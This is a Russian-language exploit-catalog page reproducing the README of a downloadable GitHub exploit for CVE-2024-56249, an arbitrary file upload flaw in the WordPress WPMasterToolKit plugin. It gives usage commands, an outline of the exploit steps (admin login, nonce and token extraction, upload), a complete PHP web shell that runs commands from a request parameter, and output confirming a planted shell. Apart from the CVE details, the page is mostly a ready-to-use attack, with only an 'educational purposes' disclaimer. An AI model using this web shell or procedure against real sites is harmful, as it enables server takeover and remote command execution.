Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56249 — WordPress WPMasterToolKit плагин <= 1.13.1 - Уязвимость произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-56249
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2024-56249

CVE-2024-56249

WordPress WPMasterToolKit плагин <= 1.13.1 - Уязвимость произвольной загрузки файлов

Репозиторий
1111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛠️ Эксплойт WordPress Master Toolkit (CVE-2024-56249)

🌟 Обзор

Этот скрипт эксплуатирует уязвимость произвольной загрузки файлов в плагине WPMasterToolKit для WordPress, позволяя злоумышленнику загрузить веб-шелл на сервер. Уязвимость существует в версиях плагина <= 1.13.1.

📝 Детали CVE

| Идентификатор CVE: | CVE-2024-56249 | | Опубликован: | 2025-01-02 | | Обновлён: | 2025-01-02 | | Описание: | Уязвимость неограниченной загрузки файлов опасного типа в Webdeclic WPMasterToolKit позволяет загружать веб-шелл на веб-сервер. | | CWE: | CWE-434: Неограниченная загрузка файлов опасного типа | | Оценка CVSS: | 9.1 (Критическая) | | Вектор CVSS: | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H |

🚀 Использование

Для эксплуатации этой уязвимости используйте следующую команду:

root@kitploit:~
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>

📋 Параметры

  • -u / : Целевой URL WordPress (например, )
--url
http://192.168.100.74:888/wordpress
  • -un / --username: Имя администратора WordPress
  • -p / --password: Пароль администратора WordPress
  • -fp / --filepath: Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)
  • -fn / --filename: Имя файла для загрузки (по умолчанию: shell.php)
  • 🧩 Объяснение скрипта

    🔍 1. Проверка уязвимости

    Скрипт начинает с проверки целевого URL, чтобы убедиться, что он уязвим к CVE-2024-56249, путем проверки версии плагина WPMasterToolKit.

    🔑 2. Аутентификация в WordPress

    Затем он пытается войти в панель администратора WordPress, используя предоставленные учетные данные.

    🛡️ 3. Извлечение токенов безопасности

    После успешного входа скрипт извлекает необходимые токены безопасности (nonce и token), необходимые для загрузки файла.

    📤 4. Развертывание полезной нагрузки

    Он загружает указанный файл (например, веб-шелл) на целевой сервер, используя извлеченные токены.

    ✅ 5. Проверка загрузки

    Наконец, скрипт проверяет, успешно ли загружен файл, проверяя его доступность через целевой URL.

    📂 Примечание

    Убедитесь, что файл шелла (например, shell.php) находится в том же каталоге, что и скрипт, перед его запуском. Это необходимо, чтобы скрипт успешно нашел и загрузил файл.

    Пример файла шелла (shell.php)

    root@kitploit:~
    <?php
    if(isset($_REQUEST['cmd'])){
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
    }
    ?>
    

    💡 Пример

    root@kitploit:~
    python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
    

    🖥️ Вывод

    root@kitploit:~
    python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
    [🔍] Detected plugin version: 1.13.1
    [🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
    [🔑] Attempting to log in...
    [✅] Authentication successful!
    [📡] Extracting security tokens...
    [✅] Extracted nonce: e4ae47c8d8
    [✅] Extracted token: e4ae47c8d8
    [📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
    [✅] Upload request sent successfully.
    [🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
    

    🛠️ Использование скрипта

    root@kitploit:~
    usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
    
    Эксплойт Master Toolkit CVE-2024-56249 #от Nxploit | Khaled Alenazi
    
    опции:
      -h, --help            показать это справочное сообщение и выйти
      -u, --url URL         Целевой URL WordPress (например, http://192.168.100.74:888/wordpress4/)
      -un, --username USERNAME
                            Имя администратора WordPress
      -p, --password PASSWORD
                            Пароль администратора WordPress
      -fp, --filepath FILEPATH
                            Путь для загрузки файла (по умолчанию: wp-content/uploads/2025/03)
      -fn, --filename FILENAME
                            Имя файла для загрузки (по умолчанию: shell.php)
    

    ⚠️ Отказ от ответственности

    Этот инструмент предназначен только для образовательных целей. Используйте его на свой страх и риск. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


    Эксплойт-скрипт от Nxploit | Khaled Alenazi

    Скачать инструмент